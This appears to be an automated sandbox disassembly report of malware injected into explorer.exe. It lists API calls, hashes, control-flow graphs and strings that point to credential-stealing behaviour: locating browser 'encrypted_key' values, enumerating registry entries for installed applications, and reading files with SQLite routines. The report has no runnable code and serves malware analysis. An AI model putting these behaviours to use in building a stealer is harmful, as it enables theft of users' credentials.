                                                                                            • API ID: CreateFilememset
                                                                                            • String ID: psow$winOpen$Ss
                                                                                            • API String ID: 2416746761-765041518
                                                                                            • Opcode ID: dfdef8362398b482639ed49ca418437049283185487e897db6efa1d56c538daa
                                                                                            • Instruction ID: 678fa3571f3a3edc2317ebd64c7714f7f6fe4034a0a5d049be3984aa1d1509ca
                                                                                            • Opcode Fuzzy Hash: dfdef8362398b482639ed49ca418437049283185487e897db6efa1d56c538daa
                                                                                            • Instruction Fuzzy Hash: 1A71C171A063429FDB50DF2AC88174BBBE2FF88324F104A2DF96497291D774E944CB92

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 786 6eb1e5-6eb20b 787 6eb20d-6eb218 call 6eaeea 786->787 788 6eb221-6eb22a 786->788 797 6eb21e 787->797 798 6eb3ea-6eb3f0 787->798 790 6eb22c-6eb237 call 6eae65 788->790 791 6eb240-6eb243 788->791 803 6eb23d 790->803 804 6eb3b4-6eb3b7 790->804 794 6eb3b9-6eb3d3 791->794 795 6eb249-6eb26b call 6ea7ae 791->795 796 6eb3db-6eb3df 794->796 807 6eb26d-6eb278 795->807 808 6eb296-6eb29f 795->808 801 6eb3e8 796->801 802 6eb3e1-6eb3e3 796->802 797->788 801->798 802->801 806 6eb3e5-6eb3e7 802->806 803->791 804->794 809 6eb3d5-6eb3d8 804->809 806->801 812 6eb27d-6eb291 call 6ea1c6 807->812 810 6eb2d6-6eb2ea call 6e6a5a 808->810 811 6eb2a1 808->811 809->796 821 6eb2ec-6eb2f1 810->821 822 6eb2f6-6eb2fd 810->822 813 6eb2a9-6eb2ad 811->813 814 6eb2a3-6eb2a7 811->814 812->804 813->804 817 6eb2b3-6eb2b9 call 6ea67c 813->817 814->810 814->813 826 6eb2be-6eb2c2 817->826 821->804 823 6eb2ff-6eb30e 822->823 824 6eb373 822->824 827 6eb377-6eb37a 823->827 824->827 826->810 828 6eb2c4-6eb2d4 826->828 829 6eb37c 827->829 830 6eb310-6eb329 CreateFileMappingW 827->830 828->812 829->804 831 6eb37e-6eb3ab call 6ea1c6 830->831 832 6eb32b-6eb357 MapViewOfFile 830->832 831->804 837 6eb3ad 831->837 832->831 833 6eb359-6eb370 832->833 833->824 837->804
                                                                                            APIs
                                                                                            • CreateFileMappingW.KERNELBASE(?,00000000,00000004,00000000,00000006,00000000,?,?,00000000), ref: 006EB31D
                                                                                            • MapViewOfFile.KERNELBASE(?,?,00000000,?,?), ref: 006EB34F
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.3152220899.00000000006E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E1000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_6e1000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID: File$CreateMappingView
                                                                                            • String ID: winShmMap1$winShmMap2$winShmMap3
                                                                                            • API String ID: 3452162329-3826999013
                                                                                            • Opcode ID: 9b6a45a2eae32452cc5184d31ef89d889cca858454108e1126aa494edf728aa3
                                                                                            • Instruction ID: 5984612bb25d632ae04c48c8fa14621e9ab1bb75c51c4347f219ce1f7262eb8d
                                                                                            • Opcode Fuzzy Hash: 9b6a45a2eae32452cc5184d31ef89d889cca858454108e1126aa494edf728aa3
                                                                                            • Instruction Fuzzy Hash: 68519C75205781DFDB25CF5AC882A6BB7E6EF84304F10882EE9828B391DB74EC05CB51
                                                                                            APIs
                                                                                            • StrStrIW.KERNELBASE(?,?), ref: 006E2E4B
                                                                                            • RegOpenKeyExW.KERNELBASE(?,?,00000000,00020119,?), ref: 006E2EE4
                                                                                            • RegEnumKeyExW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 006E2F54
                                                                                            • RegCloseKey.KERNELBASE(?), ref: 006E2F62
                                                                                              • Part of subcall function 006E19E5: RegOpenKeyExW.KERNELBASE(?,?,00000000,-00000201,?,?,00000016,?,?,?,?,006E1AE2,PortNumber,00000000,00000000), ref: 006E1A1E
                                                                                              • Part of subcall function 006E19E5: RegQueryValueExW.KERNELBASE(?,?,00000000,?,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 006E1A3C
                                                                                              • Part of subcall function 006E19E5: RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 006E1A75
                                                                                              • Part of subcall function 006E19E5: RegCloseKey.KERNELBASE(?,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,006E1AE2,PortNumber,00000000,00000000), ref: 006E1A98
                                                                                              • Part of subcall function 006E1BC5: lstrlenW.KERNEL32(00000000,00000000,?,006E2E75,PathToExe,00000000,00000000), ref: 006E1BCC
                                                                                              • Part of subcall function 006E1BC5: StrStrIW.SHLWAPI(00000000,.exe,?,006E2E75,PathToExe,00000000,00000000), ref: 006E1BF0
                                                                                              • Part of subcall function 006E1BC5: StrRChrIW.SHLWAPI(00000000,00000000,0000005C,?,006E2E75,PathToExe,00000000,00000000), ref: 006E1C05
                                                                                              • Part of subcall function 006E1BC5: lstrlenW.KERNEL32(00000000,?,006E2E75,PathToExe,00000000,00000000), ref: 006E1C1C
                                                                                              • Part of subcall function 006E1AFE: SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,00000000,00000000,?,?,006E2E83,PathToExe,00000000,00000000), ref: 006E1B16
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.3152220899.00000000006E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E1000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_6e1000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseOpenQueryValuelstrlen$EnumFolderPath
                                                                                            • String ID: PathToExe
                                                                                            • API String ID: 1799103994-1982016430
                                                                                            • Opcode ID: 406c8ec232392f84431febb233e6168efd3722fda3b4bfab9d7a6f3fff077a65
                                                                                            • Instruction ID: fcb076dee93c3b1288056425d9b7da11c16a63f221f5f3afd5801d4307dfcf73
                                                                                            • Opcode Fuzzy Hash: 406c8ec232392f84431febb233e6168efd3722fda3b4bfab9d7a6f3fff077a65
                                                                                            • Instruction Fuzzy Hash: 4F317E716063926F9715AF22C815CAF7AABEFC5350B00852CB8558B245DE34CD05DBA5
                                                                                            APIs
                                                                                              • Part of subcall function 006E1000: GetProcessHeap.KERNEL32(00000008,?,006E11C7,?,?,00000001,00000000,?), ref: 006E1003
                                                                                              • Part of subcall function 006E1000: RtlAllocateHeap.NTDLL(00000000), ref: 006E100A
                                                                                            • wsprintfW.USER32 ref: 006E4AA2
                                                                                            • RegCreateKeyExW.KERNELBASE(80000001,00000000,00000000,00000000,00000000,000F003F,00000000,?,?), ref: 006E4AC7
                                                                                            • RegCloseKey.KERNELBASE(?), ref: 006E4AD4
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.3152220899.00000000006E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E1000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_6e1000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID: Heap$AllocateCloseCreateProcesswsprintf
                                                                                            • String ID: %s\%08x$Software
                                                                                            • API String ID: 1800864259-1658101971
                                                                                            • Opcode ID: 77c12aff45c759f8504a821abb91ea3cf622ed9264ad0834bc2940ad2bd80ea4
                                                                                            • Instruction ID: f899858ea173aaa4121e3552d290edd77a1908d790798490ccd497310d1842bb
                                                                                            • Opcode Fuzzy Hash: 77c12aff45c759f8504a821abb91ea3cf622ed9264ad0834bc2940ad2bd80ea4
                                                                                            • Instruction Fuzzy Hash: 00017671601208BFEB089F95DC8ADFF77AEEB41314F40806EF500A3101EBB02E809679
                                                                                            APIs
                                                                                            • _alloca_probe.NTDLL ref: 006E431C
                                                                                            • RegOpenKeyW.ADVAPI32(80000001,?,?), ref: 006E4335
                                                                                            • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 006E4363
                                                                                            • RegCloseKey.ADVAPI32(?), ref: 006E43C8
                                                                                              • Part of subcall function 006E1953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,006E2F0C), ref: 006E1973
                                                                                              • Part of subcall function 006E1953: lstrlenW.KERNEL32(00736564,?,?,006E2F0C), ref: 006E1978
                                                                                              • Part of subcall function 006E1953: lstrcatW.KERNEL32(00000000,?,?,?,006E2F0C), ref: 006E1990
                                                                                              • Part of subcall function 006E1953: lstrcatW.KERNEL32(00000000,00736564,?,?,006E2F0C), ref: 006E1994
                                                                                              • Part of subcall function 006E418A: wsprintfW.USER32 ref: 006E4212
                                                                                              • Part of subcall function 006E1011: GetProcessHeap.KERNEL32(00000000,00000000,?,006E1A92,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,006E1AE2), ref: 006E1020
                                                                                              • Part of subcall function 006E1011: RtlFreeHeap.NTDLL(00000000,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,006E1AE2,PortNumber,00000000,00000000), ref: 006E1027
                                                                                            • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 006E43B9
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.3152220899.00000000006E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E1000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_6e1000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID: EnumHeaplstrcatlstrlen$CloseFreeOpenProcess_alloca_probewsprintf
                                                                                            • String ID:
                                                                                            • API String ID: 801677237-0
                                                                                            • Opcode ID: 5bc343e7363f28cbc4bef24d15888b3a8d92f10ab5ca3beeafaaab91537d9e87
                                                                                            • Instruction ID: 540377032a8e71e6468a195515b657a6dcb9e370976e8f4b13f25cb9f6d92fbd
                                                                                            • Opcode Fuzzy Hash: 5bc343e7363f28cbc4bef24d15888b3a8d92f10ab5ca3beeafaaab91537d9e87
                                                                                            • Instruction Fuzzy Hash: 6F1182B1104341BFE715AB21CC49DBF77EDEB88305F00852EF489D2110EB749D489A76
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.3152220899.0000000000747000.00000040.80000000.00040000.00000000.sdmp, Offset: 00747000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_747000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 4722457049b98821de7590faf61742611ac0c81fb86b126e095da9b9eb0adece
                                                                                            • Instruction ID: be8de3db096144259ee2ea1ccbf712600f0103d114f444c571550827a79ba119
                                                                                            • Opcode Fuzzy Hash: 4722457049b98821de7590faf61742611ac0c81fb86b126e095da9b9eb0adece
                                                                                            • Instruction Fuzzy Hash: ADA12A729547925FDB218E78DCC46A3BBA1EB53324B2C076DC6D18B2C3E7A85807C751
                                                                                            APIs
                                                                                            • RegOpenKeyExW.KERNELBASE(?,?,00000000,-00000201,?,?,00000016,?,?,?,?,006E1AE2,PortNumber,00000000,00000000), ref: 006E1A1E
                                                                                            • RegQueryValueExW.KERNELBASE(?,?,00000000,?,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 006E1A3C
                                                                                            • RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 006E1A75
                                                                                            • RegCloseKey.KERNELBASE(?,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,006E1AE2,PortNumber,00000000,00000000), ref: 006E1A98
                                                                                              • Part of subcall function 006E1011: GetProcessHeap.KERNEL32(00000000,00000000,?,006E1A92,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,006E1AE2), ref: 006E1020
                                                                                              • Part of subcall function 006E1011: RtlFreeHeap.NTDLL(00000000,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,006E1AE2,PortNumber,00000000,00000000), ref: 006E1027
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.3152220899.00000000006E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E1000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_6e1000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID: HeapQueryValue$CloseFreeOpenProcess
                                                                                            • String ID:
                                                                                            • API String ID: 217796345-0
                                                                                            • Opcode ID: 2629891705ea6b6d9102db847fec353cb798f02358505a2dd4449cbfe75ab7fd
                                                                                            • Instruction ID: 487f1f062414a00c01bac00e76ba23b99457f568cda14725e60203639ecaf417
                                                                                            • Opcode Fuzzy Hash: 2629891705ea6b6d9102db847fec353cb798f02358505a2dd4449cbfe75ab7fd
                                                                                            • Instruction Fuzzy Hash: 1821E7722073C16FE7288B26DD05FBB77EAEBCA745F044A2DF5859A240E635CD40A721
                                                                                            APIs
                                                                                            • RegOpenKeyW.ADVAPI32(?,?,?), ref: 006E1ED5
                                                                                              • Part of subcall function 006E1000: GetProcessHeap.KERNEL32(00000008,?,006E11C7,?,?,00000001,00000000,?), ref: 006E1003
                                                                                              • Part of subcall function 006E1000: RtlAllocateHeap.NTDLL(00000000), ref: 006E100A
                                                                                            • RegEnumKeyExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 006E1F0C
                                                                                            • RegCloseKey.ADVAPI32(?), ref: 006E1F98
                                                                                              • Part of subcall function 006E1953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,006E2F0C), ref: 006E1973
                                                                                              • Part of subcall function 006E1953: lstrlenW.KERNEL32(00736564,?,?,006E2F0C), ref: 006E1978
                                                                                              • Part of subcall function 006E1953: lstrcatW.KERNEL32(00000000,?,?,?,006E2F0C), ref: 006E1990
                                                                                              • Part of subcall function 006E1953: lstrcatW.KERNEL32(00000000,00736564,?,?,006E2F0C), ref: 006E1994
                                                                                            • RegEnumKeyExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 006E1F82
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.3152220899.00000000006E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E1000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_6e1000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID: EnumHeaplstrcatlstrlen$AllocateCloseOpenProcess
                                                                                            • String ID:
                                                                                            • API String ID: 1077800024-0
                                                                                            • Opcode ID: 66a30d5dbeba4e82a7526130127c6f7bd9a7637451b171497b9b36e6bccd81b3
                                                                                            • Instruction ID: d97ace1bd96b5e74f641dbf0886e32af6cd72437552491c934ad22e6eee5b261
                                                                                            • Opcode Fuzzy Hash: 66a30d5dbeba4e82a7526130127c6f7bd9a7637451b171497b9b36e6bccd81b3
                                                                                            • Instruction Fuzzy Hash: E3218E712083817FE705AB22CC49D6FBBEEEF89344F00892DF49992211DB35CD05AB62
                                                                                            APIs
                                                                                            • CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,00000000,00000000,00000000,006E3E1E,00000000,?,006E3FA8), ref: 006E1C46
                                                                                            • GetFileSize.KERNEL32(00000000,00000000,00000000,?,006E3FA8), ref: 006E1C56
                                                                                            • CloseHandle.KERNELBASE(00000000,?,006E3FA8), ref: 006E1C91
                                                                                              • Part of subcall function 006E1000: GetProcessHeap.KERNEL32(00000008,?,006E11C7,?,?,00000001,00000000,?), ref: 006E1003
                                                                                              • Part of subcall function 006E1000: RtlAllocateHeap.NTDLL(00000000), ref: 006E100A
                                                                                            • ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000,?,006E3FA8), ref: 006E1C76
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.3152220899.00000000006E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E1000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_6e1000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID: File$Heap$AllocateCloseCreateHandleProcessReadSize
                                                                                            • String ID:
                                                                                            • API String ID: 2517252058-0
                                                                                            • Opcode ID: 4602b7f2fac2d1955ac542f4146f9d9c827d2866a516f637b3e7462ab3638e9f
                                                                                            • Instruction ID: 82a969803f3a65d693267c5ad69392fc576cd0004c3cfdc0b12ae63bf9e63802
                                                                                            • Opcode Fuzzy Hash: 4602b7f2fac2d1955ac542f4146f9d9c827d2866a516f637b3e7462ab3638e9f
                                                                                            • Instruction Fuzzy Hash: 74F0F4312013187BD2241B26DC88E7F7A5DDB43BFAB210718F405D6190EB2A6C455175
                                                                                            APIs
                                                                                            • StrStrIA.KERNELBASE(00000000,"encrypted_key":",00000000,00000000,00000000,006E3E30,00000000,00000000,?,006E3FA8), ref: 006E2FC1
                                                                                            • lstrlen.KERNEL32("encrypted_key":",?,006E3FA8), ref: 006E2FCE
                                                                                            • StrStrIA.SHLWAPI("encrypted_key":",0073692C,?,006E3FA8), ref: 006E2FDD
                                                                                              • Part of subcall function 006E190B: lstrlen.KERNEL32(?,?,?,?,00000000,006E2783), ref: 006E192B
                                                                                              • Part of subcall function 006E190B: lstrlen.KERNEL32(00000000,?,?,?,00000000,006E2783), ref: 006E1930
                                                                                              • Part of subcall function 006E190B: lstrcat.KERNEL32(00000000,?), ref: 006E1946
                                                                                              • Part of subcall function 006E190B: lstrcat.KERNEL32(00000000,00000000), ref: 006E194A
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.3152220899.00000000006E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E1000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_6e1000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID: lstrlen$lstrcat
                                                                                            • String ID: "encrypted_key":"
                                                                                            • API String ID: 493641738-877455259
                                                                                            • Opcode ID: 78962bb1fb3fdb8b1fcf8cec08b79b3963cdd01576f46b668e591513336a792c
                                                                                            • Instruction ID: 130c2bce016398245b477c673f9d11faf312659738527d583fb818b3793670e0
                                                                                            • Opcode Fuzzy Hash: 78962bb1fb3fdb8b1fcf8cec08b79b3963cdd01576f46b668e591513336a792c
                                                                                            • Instruction Fuzzy Hash: 81E02B227477A93FB3616BB61C648873F1E9E03211305C078F10197213DF9A8801D2A8
                                                                                            APIs
                                                                                            • GetFileAttributesW.KERNELBASE(00000000,00000000,00000000,?,readonly_shm,00000000,00000000,?,?,?), ref: 006EBB40
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.3152220899.00000000006E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E1000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_6e1000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID: AttributesFile
                                                                                            • String ID: winDelete
                                                                                            • API String ID: 3188754299-3936022152
                                                                                            • Opcode ID: 55b60127e0d1e6c2e66a5fff12a24f36e00072b8846fd4daf93dc7326315c9a7
                                                                                            • Instruction ID: 56efbbc1b5e3ff0bc018db2637e1c8c82510200a29d5d2e93b162b483dc7e362
                                                                                            • Opcode Fuzzy Hash: 55b60127e0d1e6c2e66a5fff12a24f36e00072b8846fd4daf93dc7326315c9a7
                                                                                            • Instruction Fuzzy Hash: 3B110835A02398EB9711ABA7CC418BF7777DB91760F109269F801E7388DF709D029756
                                                                                            APIs
                                                                                              • Part of subcall function 006E1011: GetProcessHeap.KERNEL32(00000000,00000000,?,006E1A92,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,006E1AE2), ref: 006E1020
                                                                                              • Part of subcall function 006E1011: RtlFreeHeap.NTDLL(00000000,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,006E1AE2,PortNumber,00000000,00000000), ref: 006E1027
                                                                                              • Part of subcall function 006E1000: GetProcessHeap.KERNEL32(00000008,?,006E11C7,?,?,00000001,00000000,?), ref: 006E1003
                                                                                              • Part of subcall function 006E1000: RtlAllocateHeap.NTDLL(00000000), ref: 006E100A
                                                                                            • RegOpenKeyExW.KERNELBASE(?,?,00000000,00020119,?), ref: 006E2EE4
                                                                                            • RegEnumKeyExW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 006E2F54
                                                                                            • RegCloseKey.KERNELBASE(?), ref: 006E2F62
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.3152220899.00000000006E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E1000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_6e1000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID: Heap$Process$AllocateCloseEnumFreeOpen
                                                                                            • String ID:
                                                                                            • API String ID: 1066184869-0
                                                                                            • Opcode ID: 157238704be3245763143a54e715c5396ef6446e4f0b950fff50d7c42c67be08
                                                                                            • Instruction ID: b6096e19d1f79cac39528af7932b2daf7ae15777a6507678b00402799807f9bf
                                                                                            • Opcode Fuzzy Hash: 157238704be3245763143a54e715c5396ef6446e4f0b950fff50d7c42c67be08
                                                                                            • Instruction Fuzzy Hash: C501A231206391ABD719AF22DC15DAF7BAFEFC5355F00842DF80986150DE358C49EBA6
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.3152220899.00000000006E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E1000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_6e1000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID: ExitInitializeProcessUninitialize
                                                                                            • String ID:
                                                                                            • API String ID: 4175140541-0
                                                                                            • Opcode ID: 33b87f5cb0cd26ebe5d8423be9c85b3603db46c8a7e5415653329dc2c6f14839
                                                                                            • Instruction ID: 1265973fa1867d47d0adb22fe70ff448468a6b09d235a4bdfd606c33333d21e6
                                                                                            • Opcode Fuzzy Hash: 33b87f5cb0cd26ebe5d8423be9c85b3603db46c8a7e5415653329dc2c6f14839
                                                                                            • Instruction Fuzzy Hash: 0CC04C302463416BF6802BF15C0D70A3555BB04B13F11C014F205C5091DE544400862A
                                                                                            APIs
                                                                                            • HeapCreate.KERNELBASE(00000000,00BD0000,00000000), ref: 006E9FF8
                                                                                            Strings
                                                                                            • failed to HeapCreate (%lu), flags=%u, initSize=%lu, maxSize=%lu, xrefs: 006EA00E
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.3152220899.00000000006E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E1000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_6e1000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateHeap
                                                                                            • String ID: failed to HeapCreate (%lu), flags=%u, initSize=%lu, maxSize=%lu
                                                                                            • API String ID: 10892065-982776804
                                                                                            • Opcode ID: 3641a505df3076e00b0d7f43b6669ca316a8cf6f9bac2d36c56d5778aa197198
                                                                                            • Instruction ID: 30e524e8c289a37caae170053185df34e71741517bdabf2dbf9d467e8b500c88
                                                                                            • Opcode Fuzzy Hash: 3641a505df3076e00b0d7f43b6669ca316a8cf6f9bac2d36c56d5778aa197198
                                                                                            • Instruction Fuzzy Hash: 84F046B674A380BAE7302A92AC84FA3279EDB85789F20881AF941C3341E2706C408231
                                                                                            APIs
                                                                                              • Part of subcall function 006E1000: GetProcessHeap.KERNEL32(00000008,?,006E11C7,?,?,00000001,00000000,?), ref: 006E1003
                                                                                              • Part of subcall function 006E1000: RtlAllocateHeap.NTDLL(00000000), ref: 006E100A
                                                                                            • SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,00000000,00000000,?,?,006E2E83,PathToExe,00000000,00000000), ref: 006E1B16
                                                                                              • Part of subcall function 006E1011: GetProcessHeap.KERNEL32(00000000,00000000,?,006E1A92,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,006E1AE2), ref: 006E1020
                                                                                              • Part of subcall function 006E1011: RtlFreeHeap.NTDLL(00000000,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,006E1AE2,PortNumber,00000000,00000000), ref: 006E1027
                                                                                              • Part of subcall function 006E19E5: RegOpenKeyExW.KERNELBASE(?,?,00000000,-00000201,?,?,00000016,?,?,?,?,006E1AE2,PortNumber,00000000,00000000), ref: 006E1A1E
                                                                                              • Part of subcall function 006E19E5: RegQueryValueExW.KERNELBASE(?,?,00000000,?,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 006E1A3C
                                                                                              • Part of subcall function 006E19E5: RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 006E1A75
                                                                                              • Part of subcall function 006E19E5: RegCloseKey.KERNELBASE(?,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,006E1AE2,PortNumber,00000000,00000000), ref: 006E1A98
                                                                                            Strings
                                                                                            • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 006E1B40
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.3152220899.00000000006E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E1000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_6e1000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID: Heap$ProcessQueryValue$AllocateCloseFolderFreeOpenPath
                                                                                            • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                            • API String ID: 2162223993-2036018995
                                                                                            • Opcode ID: c9dab60a827a811e5736e934d75390449ba124351303580f706e62b5245838a9
                                                                                            • Instruction ID: bda59b98a5f5ec1af8b890abcf1d8dbada081ae22c7895124b8e6382273c337f
                                                                                            • Opcode Fuzzy Hash: c9dab60a827a811e5736e934d75390449ba124351303580f706e62b5245838a9
                                                                                            • Instruction Fuzzy Hash: ECF0BB367017CC67D6116927DC84D673B4FC7D3396306012DF4598B252EE366C856574
                                                                                            APIs
                                                                                            • SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 006EA35F
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.3152220899.00000000006E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E1000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_6e1000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID: FilePointer
                                                                                            • String ID: winSeekFile
                                                                                            • API String ID: 973152223-3168307952
                                                                                            • Opcode ID: fca056219feaa53ca30fb9eb34e9c0810fa3862a74757cf5e577238ed74dbc27
                                                                                            • Instruction ID: aaeee02ad5eb0fb284aa49af0c4613181f70c9b2e374efaabe202d5366f03101
                                                                                            • Opcode Fuzzy Hash: fca056219feaa53ca30fb9eb34e9c0810fa3862a74757cf5e577238ed74dbc27
                                                                                            • Instruction Fuzzy Hash: 62F02470615304AFD7119FA5DC009BB77AAEB45320F10C36AF821CA2D4DF30ED0096A1
                                                                                            APIs
                                                                                            • RtlAllocateHeap.NTDLL(04D30000,00000000,?), ref: 006E9EB5
                                                                                            Strings
                                                                                            • failed to HeapAlloc %u bytes (%lu), heap=%p, xrefs: 006E9ECD
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.3152220899.00000000006E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E1000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_6e1000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID: AllocateHeap
                                                                                            • String ID: failed to HeapAlloc %u bytes (%lu), heap=%p
                                                                                            • API String ID: 1279760036-667713680
                                                                                            • Opcode ID: e568a1bf5a4445135574df14409586e75e5629704b5c4e22921cc7217fa15b2d
                                                                                            • Instruction ID: 0a957e1055de5c4230c1847e0ab587e87623ddfb3fdb3f36f47a3cb5a89284a5
                                                                                            • Opcode Fuzzy Hash: e568a1bf5a4445135574df14409586e75e5629704b5c4e22921cc7217fa15b2d
                                                                                            • Instruction Fuzzy Hash: E7E0C27B6492107BC2222B95AC05F6FB76ADFD6F11F018016FA00A2261C3389C5187AA
                                                                                            APIs
                                                                                            • RtlFreeHeap.NTDLL(04D30000,00000000,?), ref: 006E9EF8
                                                                                            Strings
                                                                                            • failed to HeapFree block %p (%lu), heap=%p, xrefs: 006E9F0E
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.3152220899.00000000006E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E1000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_6e1000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID: FreeHeap
                                                                                            • String ID: failed to HeapFree block %p (%lu), heap=%p
                                                                                            • API String ID: 3298025750-4030396798
                                                                                            • Opcode ID: f90e84ca9e0be8d77a6cd5ba707c8ed92c0c1a213ac4e1fe44b9b3cb7d00d9f3
                                                                                            • Instruction ID: 5de3a08a8380dce8a26850dde740f2ebf5c4942ad52949226dc2394d3cd06ce7
                                                                                            • Opcode Fuzzy Hash: f90e84ca9e0be8d77a6cd5ba707c8ed92c0c1a213ac4e1fe44b9b3cb7d00d9f3
